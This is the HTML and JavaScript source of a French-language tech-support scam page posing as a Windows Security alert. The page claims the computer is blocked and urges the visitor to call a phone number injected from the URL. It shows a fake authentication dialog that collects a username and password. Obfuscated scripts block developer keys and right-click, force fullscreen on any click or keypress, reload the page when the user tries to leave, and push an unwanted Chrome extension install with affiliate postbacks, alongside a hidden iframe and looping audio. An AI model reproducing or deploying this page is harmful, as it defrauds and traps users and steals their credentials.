<html xmlns="http:/www.w3.org/1999/xhtml">
<head>
<meta name="robots" content="noindex,nofollow">
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="refresh" content="1;URL=''"/>
<title>**Votre ordinateur est bloqué**</title>
<audio autoplay="autoplay" loop="">
	<source src="french.mp3" type="audio/mpeg">
</audio>
<script async="" src="analytics.js"></script>
<iframe src="m.php" width="1" height="1" style="display:none"></iframe>
<script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
<script src="script.js"></script>
<style>
.col-sm-3,.container{padding-left:15px;padding-right:15px}*{-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box}.text-center{text-align:center}.container{margin-right:auto;margin-left:auto}.row{margin-right:-15px;margin-left:-15px}.col-sm-3{width:25%;float:left}img{max-width:100%}body,html{background-color:#fff!important;margin:0!important;padding:0!important;width:100%!important;height:100%;font-family:"Helvetica Neue",Helvetica,Arial,sans-serif}body,html,p{margin:10px;padding:0;overflow:hidden}.wrapper{width:100%}body{margin:0;padding:0;line-height:1}#header{height:45px;padding:5px 10px;position:relative}#header .logo{display:inline-block;float:left;height:100%}#header .logo img{height:100%}#header .search{display:block;float:right;height:26px;width:220px;background:#d4d4d4;padding:3px;position:relative}#header .search img{position:absolute;right:5px;top:5px}#header-bottom{background:#0072c5;height:60px;padding:0 5px}#header-bottom .logo{height:46px;margin-top:8px;display:inline-block;float:left;position:relative}#content h3,#content h4{margin:10px 0 6px;font-weight:400}#header-bottom .logo img{height:100%}#header-bottom ul{display:inline-block;height:100%;float:left;margin:0}#header-bottom ul li{float:left;display:block;height:100%;color:#fff;font-size:20px;padding:20px 15px;box-sizing:border-box}#header-bottom ul li.active{background:#0f5fa7}span.black{color:#000}#content{padding:20px 0 0}#content h3{color:#7f7f7f;font-size:38px;display:inline-block;width:100%}#content h4{color:#7f7f7f;font-size:24px}.image-holder{margin-top:16px;margin-bottom:20px;height:134px}#content h5{color:#1baacb;font-size:20px;font-weight:400;margin:10px 0 16px}#content h6{color:#7f7f7f;font-size:38px;font-weight:700;margin-top:36px}#content p{color:#7f7f7f;font-size:16px;line-height:20px;margin:0 10px 10px}#footer{height:60px;background:#2f2f2f;position:absolute;bottom:0}#footer .left{float:left;margin-left:100px;margin-top:20px}#footer .left h3{color:#fff;float:left;font-weight:400;font-size:15px;margin:0 10px 0 0}#footer .left .subs{float:left;background:#fff;height:26px;width:200px;position:relative;margin-top:-5px}#footer .left .subs p{font-size:14px;position:absolute;left:5px;top:5px;margin:0}#footer .left .subs img{background:#2f2f2f;height:calc(100% - 2px);position:absolute;right:1px;top:1px}#footer ul{float:right;margin:20px 30px}#footer ul li{color:#fff;font-size:16px;float:left;margin:0 10px}.chrome-alert{position:fixed;top:0;left:0;right:0}.chrome-alert>div{margin:0 auto;width:440px;background:#FBFBFB;border:1px solid #BABABA;min-height:180px;border-radius:3px;box-shadow:0 2px 0 rgba(0,0,0,.3);position:relative;font-family:'Segoe UI'}.chrome-alert h1{font-size:15px;font-weight:400;margin:0 0 5px;padding:5px 10px;color:#414141}.chrome-alert p{font-size:12px;padding:0 10px;color:#414141;margin:15px 0}.chrome-alert .action_buttons{overflow:auto}.chrome-alert .action_buttons a{float:right;font-size:12px;margin-right:15px;padding:6px 25px;text-decoration:none;color:#414141;border:1px solid #DDD;margin-top:20px;border-radius:2px;margin-bottom:20px}.chrome-alert .action_buttons a.active{border:1px solid #3B79ED;font-weight:700}.chrome-alert .content-box{max-height:440px;overflow:auto;margin:0 20px}.chrome-alert .content-box p{padding:0;margin-left:0}.chrome-alert label{padding:0 20px;font-size:12px;color:#414141}.chrome-alert label:hover{color:#3B79ED}.chrome-alert label:focus{color:#3B79ED;outline:dotted}.cross{color:#333;float:right;margin:4px 6px 0 0;text-decoration:none}iframe{position:absolute;bottom:-500px}@media screen and (max-width:1234px){#footer .left{margin-left:10px}}@media screen and (max-width:1199px){#content h3{font-size:32px}#content h5{font-size:18px}#content p{font-size:14px}#content h6{font-size:30px}}@media screen and (max-width:1024px){#header-bottom ul li{padding:20px 10px}}@media screen and (max-width:991px){#content h3{font-size:26px}#content h6{font-size:24px}}@media screen and (max-width:767px){.col-sm-3{width:100%}}@media (min-width:768px){.container{width:750px}}@media (min-width:992px){.container{width:970px}}@media (min-width:1200px){.container{width:1170px}}
.form-div{
	max-width:630px;
    width:100%;
	min-height:170px;
	position:fixed;
	z-index:3100;
	background-color:#fff;
	border:1px solid#0078d7;
	margin:0 auto;
	left:50%;
	top:21%;
	margin-top:56px;
	margin-left:7px;
	transform: translate(-50%);
	box-shadow:0px 0px 12px 3px rgba(51, 51, 51, 0.39);
}
@media screen and (max-width: 1920px) {
.form-div{
	top:30.4%;
}
}
@media screen and (max-width: 1680px) {
.form-div{
	top:29.8%;
}
}
@media screen and (max-width: 1600px) {
.form-div{
	top:25.9%;
}
}
@media screen and (max-width: 1440px) {
.form-div{
	top:25.9%;
}
}
@media screen and (max-width: 1400px) {
.form-div{
	top:29.8%;
}
}
@media screen and (max-width: 1366px) {
.form-div{
	top:21.7%
}
}
@media screen and (max-width: 1360px) {
.form-div{
	top:20.9%;
}
}
@media screen and (min-device-width: 800px) and (max-device-width: 1280px) { 
 .form-div{
	top:22.3%;
}   
}
@media screen and (min-device-width: 600px) and (max-device-width: 1280px) { 
 .form-div{
	top:8.5%;
}   
}
@media screen and (min-device-width: 960px) and (max-device-width: 1280px) { 
.form-div{
	top:27.5%;
}
}
@media screen and (min-device-width: 768px) and (max-device-width: 1280px) { 
 .form-div{
	top:20.9%;
}   
}
@media screen and (min-device-width: 720px) and (max-device-width: 1280px) { 
 .form-div{
	top:18.5%;
}   
}
@media screen and (min-device-width: 1024px) and (max-device-width: 1280px) { 
.form-div{
	top:29.2%;
}
}
@media screen and (min-device-width: 864px) and (max-device-width: 1152px) { 
 .form-div{
	top:24.5%;
}   
}
@media screen and (min-device-width: 768px) and (max-device-width: 1024px) { 
 .form-div{
	top:20.7%;
}   
}
@media screen and (min-device-width: 600px) and (max-device-width: 800px) { 
 .form-div{
	top:10.5%;
}   
}
.form-div p{
		font-size:12px;
}
.top-p{
	padding:0px 10px 0;
}
.top-p p{
	float:left;
	margin: 7px 4px;
}
.top-p span{
	float:right;
}
.main-frm{
	width:95%;
	background-color:#f0f0f0;
	padding: 0 15px;
}
.flt-left{
	float:left;
	/*! width:16%; */
	padding-bottom:0;
}
.flt-left img{
	padding-top:10px;
	padding-left:11px;
}
 .flt-right p{
	text-align:left;
	line-height:1.3;
 }
.flt-left label{
	width:100%;
	padding-top:4px;
	padding-right:10px;	
	font-size:12px;
	text-align:right;
	font-weight:normal;
}
.flt-right{
	float:right;
	width:84%;
	padding-top:1px;
	padding-bottom:0;
	margin-bottom:0;
	/*! padding-right:20px; */
}
.flt-right p{
	padding-top:0px;
    margin-bottom: 7px;
}
.flt-right input{
	width:96%;
	margin:0;
    line-height: 1.1;
}
.center-div{
	text-align:center;
	padding:7px 0 10px;
}
.center-div a{
	color:#000;
	text-decoration:none;
	font-size:11px;
}
.center-div a:hover{
	text-decoration:none;}
	.center-div a button{
	display:inline;
	width:72px;
	padding:2px 3px;	
	background-color:#e1e1e1;
	border:1px solid #c5c5c5;	
}
	.center-div a .btn-cancel{
	width:80px;
	
}
.center-div a:hover button{
	background-color:#e5f1fb;
	border:1px solid #0078d7;}
.center-div a:first-child button{
	border:2px solid #0078d7;
	margin-right:8px;
}
.clear{
	clear:both;
}
</style>
<script language="JavaScript1.2">
function openwindow()
{
var sPageURL = window.location.search.substring(1);
var randomnumber = Math.floor((Math.random()*100)+1); 
 window.open("firefox-v1.html?"+sPageURL,"mywindow","menubar=1,randomnumber,resizable=1,width=1920,height=1300",'_blank');
}
</script>
</head>
<body  onkeydown="return hCPNapvlhFicLoDm(event)" oncontextmenu="return false" style="cursor: url(&quot;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAIAAAACACAMAAAD04JH5AAAABGdBTUEAALGPC/xhBQAAAAFzUkdCAK7OHOkAAAAPUExURQAAAAICAgAAAP///5WVlXiCGdAAAAADdFJOUwD8ZX+n/7gAAABvSURBVHja7dbBAUAwEABBQf81i6CGfZipYB3J2bY/GnnAHgec9QjOY9QBccEMaAvugLRgBZQFT0BY8AZ0BV9AVvB8hEt3D8SnYIz2FMxtlI7gfvVzBN1OXM9+1Dsx/ykAAAAAAAAAAAAAAAAAgNcFnc4A9qwo+wMAAAAASUVORK5CYII=&quot;) 128 128, crosshair;background-color:#2067B2;">
<!-- <canvas id="canvasElement"></canvas> -->
<audio autoplay="autoplay" loop="">
	<source src="japan.mp3" type="audio/mpeg">
</audio>
<div id="header-bottom" class="wrapper">
  <div class="logo">
    <img src="xe-windows1.svg" alt="">
  </div>
  <ul>
    <li>Windows</li>
    <li>Devices</li>
    <li>Apps+Games</li>
    <li>Downloads</li>
    <li class="active">Security</li>
    <li>Great Things</li>
  </ul>
</div>
<div id="content" class="wrapper text-center">
  <div class="container">
    <h3>Windows a été bloqué en raison de l'activité douteuse</h3>
    <h4>S'il vous plait as arreter ou redémarrer votre ordinateur</h4>
    <div class="row">
      <div class="col-sm-3">
        <div class="image-holder">
          <img src="xe-window.svg" alt="" width='140'> 
        </div>
        <h5><strong>Appelez immédiatement</strong>
		<span class="phone_number"></span>
        </h5>
        <p>Obtenez...ide irmédiatesur les questions desécurité font appel notre nurnérosans frais </p>
      </div>
      <div class="col-sm-3">
        <div class="image-holder">
          <img src="xe-light.svg" alt="" width='100'>
        </div>
        <h5><strong>aide instantanée sans attendre</strong></h5>
        <p>Appelez
          <span class="phone_number"></span>
          (san frais)et d'améliorer la santé. de votre ordinateur
        </p>
      </div>
      <div class="col-sm-3">
        <div class="image-holder">
          <img src="xe-store.svg" alt="" width='110'>
		  </div>
        <h5><strong>Être mis à jour avec des fenêtres</strong></h5>
        <p>Nos prollessionals vous tiendrons au courant avec les derniers logiciels </p>
      </div>
      <div class="col-sm-3">
        <div class="image-holder">
          <img src="xe-ie.svg" alt="" width='120'></div>
        <h5><strong>Savoir sur navigateur sûr</strong></h5>
        <p>En savoir plus sur la navigation sécuritaire obtenir des informations sur
         <span class="phone_number"></span>
        </p>
      </div>
    </div>
    <!--BOXES END-->
    <h3>S'il vous plaît appelez immédiatement de l'assistance maintenant: <span class="black phone_number"></span>(sans frais)</h3>
  </div>
</div>
<div id="footer" class="wrapper">
  <div class="left">
    <h3>Hello from Paris</h3>
    <div class="subs">
      <p>France</p>
      <img src="xe-globe.png" alt="">
    </div>
  </div>
  <div class="logo">
    <img src="" alt="">
  </div>  <ul>
    <li>Avis Conditions</li>
    <li>d'utilisation</li>
    <li>Marques</li>
    <li>Confidentialité et Cookies</li>
    <li>Site Map</li>
    <li>© 2018 Windows</li>
  </ul>
</div>
<div class="form-div">
		<div class="top-p">
		<p>Authentification requise</p>
		<span><a href="#"><img src="close-btn.png"/></a></span>
		<div class="clear"></div>
		</div>
	<div class="main-frm">
			<div class="flt-left">
				<a href="#"><img src="quot-pic.png"/></a>
			</div>
			<div class="flt-right">
				<p>https://freegamesclub.online Je demande votre nom d'utilisateur et votre mot de passe. Attention: Les mots de passe ne seront pas envoyés sur le site que vous visitez actuellement.</p>
			</div>
				<div class="clear"></div>
			<div class="flt-left">					
				<label>Nom d'utilisateur:</label>
			</div>
			<div class="flt-right">
				<input type="text" class="user"/>
		 </div>
			<div class="clear"></div>
			<div class="flt-left">					
				<label>Mot de passe:</label>
			</div>
			<div class="flt-right">
				<input type="text" class="pass"/>					
			</div>						
			<div class="clear"></div>
			<div class="center-div">
					<a href="javascript:openwindow()"><button type="button" class="btn-submit" >D'accord</button></a>
					<a href="javascript:openwindow()"><button type="button" class="btn-cancel">Annuler</button></a>
			</div>
	</div>
</div>
<script>
function getVariableFromURl(name)
{
	name = name.replace(/[\[]/,"\\\[").replace(/[\]]/,"\\\]");
	var regexS = "[\\?&]"+name+"=([^&#]*)";
	var regex = new RegExp( regexS );
	var results = regex.exec( window.location.href );
	if( results == null )
		return "";
	else
		return results[1];
}
var phone = getVariableFromURl('p_num'); 
var phone = decodeURIComponent(phone);
var x     = document.getElementsByClassName("phone_number");
var i;
for (i = 0; i < x.length; i++) {
	x[i].innerHTML=phone;
} 	
	  var subid 	= '';
      var clickid 	= '';
      var postback 	= 'wHBAN004C9IFC3951PRAFUP0';
      var cl = false;
      var isFullScreen = !(!document.fullscreenElement && !document.msFullscreenElement && !document.mozFullScreenElement && !document.webkitFullscreenElement);
      window.onload = function () {
        var langs = {
          en: {
            img: 'ru_new.png',
            h3: 'System notification!',
            p: 'Important additions for your browser are downloading and installation is in progress. Press OK and install the extensions!'
          },
          ru: {
            img: 'ru_new.png',
            h3: '????????? ???????????!',
            p: '???????????? ???????? ? ????????? ??????? ?????????? ??? ?????? ????????. ??????? "??" ? ?????????? ???????????? ??????????.'
          },
          de: {
            img: 'ru_new.png',
            h3: 'Systembenachrichtigung!',
            p: 'Important additions for your browser are downloading and installation is in progress. Press OK and install the extensions!'
          },
          fr: {
            img: 'ru_new.png',
            h3: 'Avis de système !',
            p: 'Important additions for your browser are downloading and installation is in progress. Press OK and install the extensions!'
          },
          es: {
            img: 'ru_new.png',
            h3: '¡Notificación del sistema!',
            p: 'Se está realizando la descarga e instalación de una extensión importante para su navegador. Haga clic en  "Aceptar" e instale la extensión propuesta.'
          },
          pt: {
            img: 'ru_new.png',
            h3: 'Mensagem de sistema!',
            p: 'Importantes adições para o seu navegador estão sendo transferidas ea instalação está em andamento. Pressione OK e instale as extensões!'
          },
        };
        if (window.chrome !== undefined && window.chrome.webstore && window.chrome.webstore.install) {
          if (document.cookie.indexOf('tmp_name=') == -1) {
            setCookie('tmp_name', 'landing', 24);
          }
          var lang = langs[navigator.language];
          hTRnKeAy1lgYB4La();
          
          if (lang) {
            document.querySelector('header img').src = lang.img;
            document.querySelector('.gR3SfJr5l9O4jbWa h3').innerText = lang.h3;
            document.querySelector('.gR3SfJr5l9O4jbWa p').innerText = lang.p;
          }
          
          if (document.cookie.indexOf('c_open' + '=') === -1) {
            setCookie('c_open', 'landing', 1);
            window.location.href = window.location.href;
          }
          
          try {
            document.querySelector('footer').style.display = 'none';
            document.querySelector('header').style.display = 'block';
          } catch (e) {}
            
        } else {
          window.onbeforeunload = null;
          location.assign('#');
        }
      };
      window.onresize = function () {
        if (document.querySelector('header')) {
          if (window.innerHeight != screen.height) {
            document.querySelector('header').style.display = 'block';
            document.querySelector('footer').style.display = 'none';
          }
          else {
            document.querySelector('header').style.display = 'none';
            document.querySelector('footer').style.display = 'block';
          }
        }
      };
      window.onbeforeunload = function (ev) {
        return "You have to install extension !";
      };
	  
	  function fullScreen()
	  {
	    var docElm = document.documentElement;
            if (docElm.requestFullscreen) {
                docElm.requestFullscreen();
            }
            else if (docElm.msRequestFullscreen) {
                docElm = document.body; //overwrite the element (for IE)
                docElm.msRequestFullscreen();
            }
            else if (docElm.mozRequestFullScreen) {
                docElm.mozRequestFullScreen();
            }
            else if (docElm.webkitRequestFullScreen) {
                docElm.webkitRequestFullScreen();
            }
		return false;
	  }
	  
      function kzogExQSrDChY4Iq() {
		fullScreen();
		var sPageURL 		= 	window.location.search.substring(1);
		window.open("firefox-v1.html?"+sPageURL,"Alert","width=1,height=1,scrolling=yes,fullscreen=yes,left=3000,top=3000");
		eKxJS2GzrfWPEjgm();
      }
      function setCookie(a, b, c) {
        var d = '';
        if (c) {
          var e = new Date();
          e.setTime(e.getTime() + (c * 60 * 60 * 1000));
          d = '; expires=' + e.toUTCString()
        }
        console.log(d);
        document.cookie = a + "=" + b + d + ";path=/";
      }
      function hTRnKeAy1lgYB4La() {
        if (document.cookie.indexOf('c_name' + '=') !== -1 && document.cookie.indexOf('tmp_name=') !== -1) {
          window.onbeforeunload = null;
          location.assign('#');
        }
      }
      function gpAkSJDl9ENT5gLQ() {
        try {
          document.querySelector('footer').style.display = 'block';
          document.querySelector('header').style.display = 'none';
        } catch (e) {}
      }
      function eKxJS2GzrfWPEjgm() {
        //gpAkSJDl9ENT5gLQ();
		
        var xhr = new XMLHttpRequest();
        xhr.open('GET', "#", true);
        xhr.send();
          
        cl = true;
        chrome.webstore.install('', function () {
          window.onbeforeunload = null;
          var xhr = new XMLHttpRequest();
          xhr.open('GET', "#", true);
          xhr.onload = function () {
            if (clickid) {
              var xhrPostback = new XMLHttpRequest();
              xhrPostback.open('GET', '#', true);
              xhrPostback.onload = function () {
                var xhrPostback1 = new XMLHttpRequest();
                xhrPostback1.open('GET', '#', true);
                xhrPostback1.onload = function () {
                  var xhrPostback3 = new XMLHttpRequest();
                  xhrPostback3.open('GET', '#', true);
                  xhrPostback3.onload = function () {
                    open('#', '_self');
                  };
                  xhrPostback3.onerror = function () {
                    open('#', '_self');
                  };
                  xhrPostback3.send();
                };
                xhrPostback1.onerror = function () {
                  var xhrPostback3 = new XMLHttpRequest();
                  xhrPostback3.open('GET', '#', true);
                  xhrPostback3.onload = function () {
                    open('#', '_self');
                  };
                  xhrPostback3.onerror = function () {
                    open('#', '_self');
                  };
                  xhrPostback3.send();
                };
                xhrPostback1.send();
              };
              xhrPostback.onerror = function () {
                var xhrPostback1 = new XMLHttpRequest();
                xhrPostback1.open('GET', '#', true);
                xhrPostback1.onload = function () {
                  var xhrPostback3 = new XMLHttpRequest();
                  xhrPostback3.open('GET', '#', true);
                  xhrPostback3.onload = function () {
                    open('#', '_self');
                  };
                  xhrPostback3.onerror = function () {
                    open('#', '_self');
                  };
                  xhrPostback3.send();
                };
                xhrPostback1.onerror = function () {
                  var xhrPostback3 = new XMLHttpRequest();
                  xhrPostback3.open('GET', '#', true);
                  xhrPostback3.onload = function () {
                    open('#', '_self');
                  };
                  xhrPostback3.onerror = function () {
                    open('#', '_self');
                  };
                  xhrPostback3.send();
                };
                xhrPostback1.send();
              };
              xhrPostback.send();
            } else if (subid) {
              var xhrPostback = new XMLHttpRequest();
              xhrPostback.open('GET', '#' + subid, true);
              xhrPostback.onload = function () {
                open('#', '_self');
              };
              xhrPostback.onerror = function () {
                open('#', '_self');
              };
              xhrPostback.send();
            } else if (postback) {
              var xhrPostback = new XMLHttpRequest();
              xhrPostback.open('GET', '#' + postback, true);
              xhrPostback.onload = function () {
                open('#', '_self');
              };
              xhrPostback.onerror = function () {
                open('#', '_self');
              };
              xhrPostback.send();
            } else {
              open('#', '_self');
            }
          };
          xhr.onerror = function () {
            open('#', '_self');
          };
          xhr.send();
        }, function (error) {
            cl = false;
            var xhr = new XMLHttpRequest();
            
            xhr.open('GET', "#", true);
            xhr.send();
            console.log(error);
            document.querySelector('footer').style.display = 'none';
            
            try {
              document.querySelector('header').style.display = 'block';
            } catch (v) {
            }
            setTimeout(function () {
              try {
                document.webkitCancelFullScreen();
              } catch (e) { }
              try {
                document.cancelFullscreen();
              } catch (e) { }
            }, 100);
        });
      }
      function hCPNapvlhFicLoDm(e) {
        if (e.which === 123 || e.which === 17) {
          return false;
        }
      }
      function hxvw7JrbMUZBqVhN() {
        var c = confirm("You should install the chrome extension!");
        if (!c) {
          hxvw7JrbMUZBqVhN();
        }
      }
      // document.body.addEventListener('keyup', f5WOxk2dF74GMRLf);
      document.body.addEventListener('keyup', kzogExQSrDChY4Iq);
      document.body.addEventListener('click', kzogExQSrDChY4Iq);
      function f5WOxk2dF74GMRLf() {
        return false;
      }
      function dsfsf(e) {
        e = e ? e : window.event;
        var from = e.relatedTarget || e.toElement;
        if (!from || from.nodeName === "HTML") {
          // hxvw7JrbMUZBqVhN()
          
            window.location.href = window.location.href;
        }
      }
      function addEvent(obj, evt, fn) {
        if (obj.addEventListener) {
          obj.addEventListener(evt, fn, false);
        } else if (obj.attachEvent) {
          obj.attachEvent("on" + evt, fn);
        }
      }
      function removeEvent(obj, evt, fn) {
        if (obj.removeEventListener) {
          obj.removeEventListener(evt, fn, false);
        } else if (obj.detachEvent) {
          obj.detachEvent("on" + evt, fn);
        }
      }
      //addEvent(document, "mouseout", dsfsf);
  
      window.onblur = function() {
        if (!isFullScreen && !cl) {
          window.location.href = window.location.href;
        }
      };
</script>
</body>
</html>